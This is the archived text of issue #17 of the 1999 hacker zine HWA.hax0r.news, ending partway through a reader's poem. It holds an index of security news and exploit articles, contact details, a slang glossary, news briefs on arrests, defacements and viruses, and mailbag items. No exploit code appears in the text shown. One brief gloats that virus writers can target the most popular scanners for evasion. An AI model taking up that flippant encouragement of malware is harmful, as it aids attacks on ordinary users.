💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn17.… captured on 2022-01-08 at 15:59:21.
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 17 Volume 1 1999 May 8th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #17
=-----------------------------------------------------------------------=
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #17
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. The FBI and the secret wiretapping by ENFOPOL....................
04.0 .. NIPRNET, the DoD considers (yeah considers) installing *gasp*....
FIREWALLS to help thwart the hacker threat.......................
05.0 .. Mainstream press on some of Mitnicks accrued damages.............
06.0 .. CyberCrooks easier to catch?.....................................
07.0 .. NASA doesn't report cyberattacks.................................
08.0 .. Encryption debate called for.....................................
09.0 .. Product: Hackers stopped cold by 'BlackICE'?.....................
10.0 .. FreeBSD 3.1 remote reboot exploit................................
11.0 .. More on the MSIE favicon.ico bug.................................
12.0 .. Simple Nomad sheds some light on the Phone Masters (not Rangers as
reported last week - sorry Ed)...................................
13.0 .. Israeli Sciemtist reports advance in codebreaking................
14.0 .. Ecommerce risks losing customers if security is not addressed....
15.0 .. Computer crime threatens the economy??...........................
16.0 .. Cracking the casinos, a Defcon primer? ;) .......................
17.0 .. Crackers gearing up for attacks on U.S nuke labs?................
18.0 .. Calling all |<rad hax0rZ!........................................
19.0 .. Millennium Bug Insurance Hoax....................................
20.0 .. Y2K Viruses......................................................
21.0 .. 2 viruses more powerful than CIH by same author 'hidden'.........
22.0 .. Microsoft kept info about a Y2K fix for win95 users quiet........
23.0 .. Iron Lungs and DK raided by the FBI..............................
23.1 .. Statement from F0rpaxe (associated with IL)......................
24.0 .. SIPRNET to be made more secure...................................
25.0 .. U.S Army to teach "Information Survival".........................
26.0 .. TAKEDOWN gets ready for TAKEOFF..................................
27.0 .. Free Email vulnerable............................................
28.0 .. Are consumers worried about online security?.....................
29.0 .. Hotmail Passwords Stolen.........................................
30.0 .. Microsoft IIS 4.0 vulnerability found............................
31.0 .. [ISN] More on CIH , college student receives demerit.............
32.0 .. [ISN] Taiwan virus suspect free on lack of victims...............
33.0 .. cgichk1.34c modification adds port numbers by 'Joe Hacker'.......
34.0 .. Microsoft Netmeeting Vulnerabilities.............................
35.0 .. IBM AS400+Domino DoS Vulnerability...............................
36.0 .. Gateprobe.c Wingate Scanner by Bong .............................
37.0 .. Gatescan20.c Wingate Scanner by Misteri0.........................
38.0 .. The BloatWare Debate.............................................
39.0 .. apache.c claims to be a root exploit but actually roots you......
40.0 .. Cyber-Christ meets Lady Luck. Winn Schwartau in Las Vegas (DefCon II)
41.0 .. Cyber-Christ takes a byte out of the big apple, Winn Schwartau at HOPE
42.0 .. IC2000, Interception Capabilities 2000 and ECHELON...............
43.0 .. WuFTPd exploit w00f.c ...........................................
44.0 .. VirusScan NT advisory from Simple Nomad..........................
45.0 .. New CorelDraw Virus..............................................
46.0 .. TWINKLE, the number crunching machine to attack RSA keys.........
47.0 .. 25 fired due to e-mail abuses....................................
48.0 .. Punishment CIH vs MELISSA .......................................
49.0 .. World of freedom: an interview with Zero Knowledge Systems by BHZ
50.0 .. Trojan B'Gone....................................................
51.0 .. The New Generation of Browsers...................................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls .......................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD Computer Underground Digest...<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+Security................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+Security................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+Security................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
News site+Security related site...<a href="http://www.403-security.org/">http://www.403-security.org/</a>
News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a>
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="http://www.cnn.com/SEARCH/">Link</a>
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
http://www.ottawacitizen.com/business/
<a href="http://www.ottawacitizen.com/business/">Link</a>
http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
http://www.zdnet.com/zdtv/cybercrime/
<a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="http://freespeech.org/eua/">Link</a>
http://ech0.cjb.net ech0 Security
<a href="http://ech0.cjb.net">Link</a>
http://net-security.org Net Security
<a href="http://net-security.org">Link</a>
http://www.403-security.org Daily news and security related site
<a href="http://www.403-security.org">Link</a>
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X
������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman
and the #innerpulse, #hns crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ Cracker gets Six Months to Three Years
From HNN http://www.hackernews.com/
contributed by Sail3
Nicholas Middleton, convicted of breaking into the San
Francisco ISP Slip.net and of causing more than $40,000
in damage, will be sentenced by Senior U.S. District
Judge William Orrick Jr. on Aug. 4. Middleton is likely to
receive six months to three years in jail.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2254225,00.html
++ People keep hacking the "10 Things I Hate About You" site
From HNN http://www.hackernews.com/
contributed by Jimmy Riley
Seems the owners of the site are getting angry that it
is getting hacked. Instead of issuing warnings that it
might go away if hacked again why not just fix the site?
10 Things I Hate About You
http://movies.go.com/10things/today/index.html
++ How to infect the most people with your next virus release...
Contributed by FProphet
CWS POLL MAY 4 1999
What virus scanner do you currently use?
282 44.1% McAfee VirusScan
251 39.1% Norton AntiVirus
27 4.2% I don't use a virus scanner
22 3.5% AntiViral Toolkit Pro (AVP)
17 2.6% InoculateIT
12 1.8% Other
10 1.5% Thunderbyte AV
8 1.2% F-Secure
8 1.2% Inoculan
2 0.3% Panda AntiVirus
Total Votes: 639
Wow, eh? Now if you want to write a virus, make sure it isn't detected by
those and you'll be laughing!
<g>
++ NSA Technology Transfer Program
From HNN http://www.hackernews.com/
contributed by weld
Who says the NSA never does anything for the
commercial sector? Here are technologies that you the
taxpayer has funded that the NSA has released for all to
use. Examples include a compact fingerprint scanner,
drive controlled disk sanitation, IPSEC, and of course
some crypto applications.
Just think if they are giving out this stuff what other
cool things must be classified.
Technology Transfer Fact Sheets
http://www.nsa.gov:8080/programs/tech/toc.html
++ DISA redesigning their protocol to stop hackers
By Astral 04.05.1999 17:55 http://www.403.security.org/
DISA is planing to redesign their Non-Classified Internet Protocol Router Network (NIPRNet) to stop
hackers.Like HNN wrote they are probably going to install few firewalls to stop hackers.
++ CIH destroyed your data ?
By Astral 03.05.1999 13:18 http://www.403-security.org/
A Bangladesh student wrote program that is able to recover data destroyed by CIH virus.Program is
called "MRECOVER" and it will posted on the Internet.He also sad that program is able to recover all
data successfully in just few minutes.So if CIH destroyed your data you are saved :-) (no url)
++ AOL REWORKS SPAM TEAM (TECH. May 4th 9:15 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/19471.html
Long praised for cracking down on spammers, AOL is now
cutting back its junk email task force. Does a reorg mean
more or less spam for the Net? By Chris Oakes.
++ SPACE STATION BACK ON TRACK (TECH. 9:15 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/19482.html
Things are looking up for the International Space Station.
The Russian Space Agency worked out its shaky financing and
will participate with NASA in the next mission on 20 May. By
Polly Sprenger.
++ Y2K new motive for virus writers
http://www.403-security.org/
Astral 05.05.1999 14:50
Sunday time published article about Y2K viruses.Not Y2K viruses, the Y2K motives for viruses.Like Mellisa was
working, sending e-mails with password to adult sites Y2K viruses would spread on same way but this time by
sending .exe Year 2000 postcards.
++ gH 're hacking very active last few weeks
http://www.403-security.org/
Astral 05.05.1999 14:50
This time victim was http://aiis.ameritech.com/. gH are hacking very active last few weeks, we saw lot of their
hacks.Mirror of this hack is available on our Hacked Sites section.
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: "S. G. R. MacMillan" <mail@sgrm.com>
To: <cruciphux@dok.org>
Subject: Hacker's resource
Date: Thu, 6 May 1999 16:31:02 -0400
I'm considered by many hackers as an essential resource: a defence lawyer
who understands digital issues. You might consider a link to my site.
__________________________________
S. G. R. MacMillan
Barrister
For the defence of serious criminal cases
http://www.sgrm.com
mail@sgrm.com
PGP Digital Encryption Supported
-=-
More great poetry from Liquid Phire!;
Delivered-To: dok-cruciphux@dok.org
From: "liquid phire" <liquidphire@hotmail.com>
To: cruciphux@dok.org
Subject: more stuffs
Date: Mon, 03 May 1999 18:41:03 PDT
Mime-Version: 1.0
Content-type: text/plain; format=flowed;
***i never get any fucking feedback, makes me wonder how many people read my
stuffs and dont hate me for it. i'm doubtful on this one, i think it is way
to flowery and nice but i have no one to tell me that so here i send it, i
need suggestions, just be nice and constructive.***
the computer hums, the darkness fades into bluish light. he stares at the
screen, shifting from the pulsating lower bar to the logo displayed above.
he closes his eyes and in moments they are teased open by the starting
sound.
he worships here, his microsoft gods and intel dreams. he comes here for
solace; a youth with no direction. this is where he finds the comfort that
the 20th century life that he leads deprives him of.
he logs onto aol, finds love in virtual eyes and open arms in cyber cafes.
he follows the links to reccomended sites, never ventures off the beaten
path, but sometimes...
late at night when the tv is off and no music finds its way into his room.
when the house is quiet and his parents sleep. the time when no one is there
to save him, to reassure him, to tell him to look away.
